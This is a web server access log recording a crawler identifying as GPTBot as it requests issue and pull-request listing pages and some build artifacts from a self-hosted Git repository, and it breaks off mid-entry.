-[17/Feb/2026:19:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 41199] [Gzip 14.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:19:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23758] [Gzip 11.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:19:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:19:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:19:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:19:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 